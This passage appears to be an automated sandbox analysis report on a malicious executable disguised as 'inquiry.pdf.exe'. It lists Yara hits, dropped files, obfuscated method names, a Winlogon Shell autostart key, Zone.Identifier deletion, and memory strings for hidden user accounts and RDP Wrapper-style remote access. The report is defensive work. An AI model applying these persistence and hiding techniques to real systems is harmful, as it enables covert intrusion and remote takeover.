            Source: Yara matchFile source: 00000000.00000002.329246325.0000000003C4E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.328710772.0000000003B49000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.319901193.0000000002B4E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000012.00000002.534887876.0000000003D5D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.325693472.0000000002CBB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: inquiry.pdf.exe PID: 5896, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: glonkjhg.exe PID: 4760, type: MEMORYSTR
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeCode function: 18_2_0124D18F push dword ptr [ebp+ecx-75h]; retf
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeCode function: 18_2_0124D238 push dword ptr [ebp+ebx-75h]; iretd
            Source: jhFFFffkl.exe.18.drStatic PE information: 0xC7142059 [Sun Nov 3 05:36:25 2075 UTC]
            Source: inquiry.pdf.exe, Ao3y8/f0F3R.csHigh entropy of concatenated method names: '.ctor', 'd4G5C', 'Ha1c9', 'Bf0m6', 'Zm4e1', 'Dk5q6', 'Ha5o0', 'Nn83E', 'Lz79T', 'Je8s6'
            Source: 0.0.inquiry.pdf.exe.a90000.0.unpack, Ao3y8/f0F3R.csHigh entropy of concatenated method names: '.ctor', 'd4G5C', 'Ha1c9', 'Bf0m6', 'Zm4e1', 'Dk5q6', 'Ha5o0', 'Nn83E', 'Lz79T', 'Je8s6'
            Source: glonkjhg.exe.13.dr, Ao3y8/f0F3R.csHigh entropy of concatenated method names: '.ctor', 'd4G5C', 'Ha1c9', 'Bf0m6', 'Zm4e1', 'Dk5q6', 'Ha5o0', 'Nn83E', 'Lz79T', 'Je8s6'
            Source: jhFFFffkl.exe.18.dr, Astronotplart/My/tT7bk4FnxbYaKqMtWjIqvyKWh4J9tkfAvLZ8e5Y4BU.csHigh entropy of concatenated method names: 'nn9DM7TZkpnl4dSPqnpPS2oW', 'LztRLhG61h4KFshxtO7P7', 'G4vjdlUHNvtWZenTXSNdtGwCIYmCoKE77', '5fQycwGNtn0lBuMB2jteITZhMQF3wG', 'ZJSZEAUpgBzwUgSXvnbC6lEhXmP5VpN2nCiGvnzMTR'
            Source: jhFFFffkl.exe.18.dr, Astronotplart/gabKErPURPS76kDKjrme.csHigh entropy of concatenated method names: '.ctor', 'EmwYECB1wGyvIA2snT', 'zQyq6GQCkVXH2m9ORWKDS7znEfc2l', 'X3TE6RCIZMD7ECwwVoqD8j43J8u', 'SwV7wVQkM24hXoCSpr83uLH4TEFtSUXME6LQS7', 'gIglw7CqsSJGzE2AtTN3JYbIYwYS1QQ7ADpw', 'aciMX0Q3f70STq8WXW'
            Source: jhFFFffkl.exe.18.dr, Astronotplart/My/nVdeDLHvVsfVxwgFzORDky8W3f9u4lGmiaWnSDb.csHigh entropy of concatenated method names: '.cctor', 'ipfF6OV8JHE8Qin24Sz2H', 'GBAU51HdoykwtyLJ8j', 'A6Cmw4VPbNKHMkR6BnXqjGTCsaLYYK', 'ZhXAveIVREq8oAgNFODqxTnhx35', 'TL13XiWxESQiImm09SkPUl2iIyfqvqfNa1eW0WN', 'hXlgWtIDkKwHkCLRcj1P0yvWMryPDm997zSDv', 'crnIowWf8YVTDoRdGn'
            Source: jhFFFffkl.exe.18.dr, Astronotplart/rtGPmvPIdl5IaacYtOxDvUDj4cyvAKDSBQSIKnjuJ.csHigh entropy of concatenated method names: '.ctor', 'lXIhNy5k2zuUtWijXRf3Smh', 'K04wNKQqGraj7cH31jV3', 'XjtDF35KWLF6l1is3R1Q6HxEJwEr3PbjtGbh2HVd2', 'lvOSFdRQCCluXgGa7jGQkU1jNoXRaK5EpfPYnW', 'gZQk7h6spRLFg3NwAmoe'
            Source: jhFFFffkl.exe.18.dr, Astronotplart/My/Resources/cZsjfbJLI2Nt8If5QOa3YzSXxDXbcmzUTY.csHigh entropy of concatenated method names: '7tuLHfXnvgcErulp', 'vFPZGqKub8S44KK9njyrAe1CN2qDJ3IQa7tiGW3Oebu', 'p0Rr9tY6YlifmwQtRmfPXGEDX', 'IPf8zIYNrroPiylxpRDezmMidW58Fr8mLO'
            Source: 23.0.jhFFFffkl.exe.700000.0.unpack, Astronotplart/My/tT7bk4FnxbYaKqMtWjIqvyKWh4J9tkfAvLZ8e5Y4BU.csHigh entropy of concatenated method names: 'nn9DM7TZkpnl4dSPqnpPS2oW', 'LztRLhG61h4KFshxtO7P7', 'G4vjdlUHNvtWZenTXSNdtGwCIYmCoKE77', '5fQycwGNtn0lBuMB2jteITZhMQF3wG', 'ZJSZEAUpgBzwUgSXvnbC6lEhXmP5VpN2nCiGvnzMTR'
            Source: 23.0.jhFFFffkl.exe.700000.0.unpack, Astronotplart/gabKErPURPS76kDKjrme.csHigh entropy of concatenated method names: '.ctor', 'EmwYECB1wGyvIA2snT', 'zQyq6GQCkVXH2m9ORWKDS7znEfc2l', 'X3TE6RCIZMD7ECwwVoqD8j43J8u', 'SwV7wVQkM24hXoCSpr83uLH4TEFtSUXME6LQS7', 'gIglw7CqsSJGzE2AtTN3JYbIYwYS1QQ7ADpw', 'aciMX0Q3f70STq8WXW'
            Source: 23.0.jhFFFffkl.exe.700000.0.unpack, Astronotplart/My/nVdeDLHvVsfVxwgFzORDky8W3f9u4lGmiaWnSDb.csHigh entropy of concatenated method names: '.cctor', 'ipfF6OV8JHE8Qin24Sz2H', 'GBAU51HdoykwtyLJ8j', 'A6Cmw4VPbNKHMkR6BnXqjGTCsaLYYK', 'ZhXAveIVREq8oAgNFODqxTnhx35', 'TL13XiWxESQiImm09SkPUl2iIyfqvqfNa1eW0WN', 'hXlgWtIDkKwHkCLRcj1P0yvWMryPDm997zSDv', 'crnIowWf8YVTDoRdGn'
            Source: 23.0.jhFFFffkl.exe.700000.0.unpack, Astronotplart/My/Resources/cZsjfbJLI2Nt8If5QOa3YzSXxDXbcmzUTY.csHigh entropy of concatenated method names: '7tuLHfXnvgcErulp', 'vFPZGqKub8S44KK9njyrAe1CN2qDJ3IQa7tiGW3Oebu', 'p0Rr9tY6YlifmwQtRmfPXGEDX', 'IPf8zIYNrroPiylxpRDezmMidW58Fr8mLO'
            Source: 23.0.jhFFFffkl.exe.700000.0.unpack, Astronotplart/rtGPmvPIdl5IaacYtOxDvUDj4cyvAKDSBQSIKnjuJ.csHigh entropy of concatenated method names: '.ctor', 'lXIhNy5k2zuUtWijXRf3Smh', 'K04wNKQqGraj7cH31jV3', 'XjtDF35KWLF6l1is3R1Q6HxEJwEr3PbjtGbh2HVd2', 'lvOSFdRQCCluXgGa7jGQkU1jNoXRaK5EpfPYnW', 'gZQk7h6spRLFg3NwAmoe'
            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Roaming\glonkjhg.exeJump to dropped file
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeFile created: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeJump to dropped file

            Boot Survival

            barindex
            Creates an undocumented autostart registry key
            Source: C:\Windows\SysWOW64\reg.exeKey value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior

            Hooking and other Techniques for Hiding and Protection

            barindex
            Contains functionality to hide user accounts
            Source: inquiry.pdf.exe, 00000000.00000002.328710772.0000000003B49000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
            Source: inquiry.pdf.exe, 00000000.00000002.328710772.0000000003B49000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEETermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilege%SystemRoot%\System32\termsrv.dllSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDll127.0.0.1SYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType]+@
            Source: inquiry.pdf.exe, 00000000.00000002.329246325.0000000003C4E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
            Source: inquiry.pdf.exe, 00000000.00000002.329246325.0000000003C4E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEETermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilege%SystemRoot%\System32\termsrv.dllSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDll127.0.0.1SYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType]+@
            Source: glonkjhg.exe, 00000012.00000002.534025112.0000000003C58000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
            Source: glonkjhg.exe, 00000012.00000002.534025112.0000000003C58000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEETermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilege%SystemRoot%\System32\termsrv.dllSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDll127.0.0.1SYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType]+@
            Source: glonkjhg.exe, 00000012.00000002.534887876.0000000003D5D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
            Source: glonkjhg.exe, 00000012.00000002.534887876.0000000003D5D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEETermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilege%SystemRoot%\System32\termsrv.dllSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDll127.0.0.1SYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType]+@
            Source: AddInProcess32.exe, 00000013.00000000.403984932.0000000000919000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
            Source: AddInProcess32.exe, 00000013.00000000.403984932.0000000000919000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEETermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilege%SystemRoot%\System32\termsrv.dllSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDll127.0.0.1SYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType]+@
            Source: AddInProcess32.exe, 00000014.00000003.485883886.0000000000EA6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
            Source: AddInProcess32.exe, 00000014.00000003.485883886.0000000000EA6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEETermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilege%SystemRoot%\System32\termsrv.dllSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDll127.0.0.1SYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType]+@
            Source: AddInProcess32.exe, 00000014.00000003.485580240.0000000000E94000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
            Source: AddInProcess32.exe, 00000014.00000003.485580240.0000000000E94000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEETermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilege%SystemRoot%\System32\termsrv.dllSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDll127.0.0.1SYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType]+@
            Source: AddInProcess32.exe, 00000014.00000003.486195668.0000000000E98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
            Source: AddInProcess32.exe, 00000014.00000003.486195668.0000000000E98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEETermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilege%SystemRoot%\System32\termsrv.dllSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDll127.0.0.1SYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType]+@
            Hides that the sample has been downloaded from the Internet (zone.identifier)
            Source: C:\Users\user\Desktop\inquiry.pdf.exeFile opened: C:\Users\user\Desktop\inquiry.pdf.exe\:Zone.Identifier read attributes | delete
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeFile opened: C:\Users\user\AppData\Roaming\glonkjhg.exe\:Zone.Identifier read attributes | delete
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe:Zone.Identifier read attributes | delete
            Uses an obfuscated file name to hide its real file extension (double extension)
            Source: Possible double extension: pdf.exeStatic PE information: inquiry.pdf.exe
            Source: C:\Users\user\Desktop\inquiry.pdf.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\inquiry.pdf.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\inquiry.pdf.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\inquiry.pdf.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\inquiry.pdf.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\inquiry.pdf.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\inquiry.pdf.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\inquiry.pdf.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\inquiry.pdf.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\inquiry.pdf.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\inquiry.pdf.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\inquiry.pdf.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\inquiry.pdf.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\inquiry.pdf.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\inquiry.pdf.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\inquiry.pdf.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\inquiry.pdf.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\inquiry.pdf.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\inquiry.pdf.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\inquiry.pdf.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\inquiry.pdf.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\inquiry.pdf.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\inquiry.pdf.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\inquiry.pdf.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\inquiry.pdf.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\inquiry.pdf.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\inquiry.pdf.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\inquiry.pdf.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\inquiry.pdf.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\inquiry.pdf.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\inquiry.pdf.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\inquiry.pdf.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\inquiry.pdf.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\inquiry.pdf.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\inquiry.pdf.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\inquiry.pdf.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\inquiry.pdf.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\inquiry.pdf.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\inquiry.pdf.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\inquiry.pdf.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\inquiry.pdf.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\inquiry.pdf.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\inquiry.pdf.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\inquiry.pdf.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\inquiry.pdf.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\inquiry.pdf.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\inquiry.pdf.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\inquiry.pdf.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\inquiry.pdf.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\inquiry.pdf.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\inquiry.pdf.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\inquiry.pdf.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\inquiry.pdf.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\inquiry.pdf.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\inquiry.pdf.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\inquiry.pdf.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\inquiry.pdf.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeProcess information set: NOOPENFILEERRORBOX
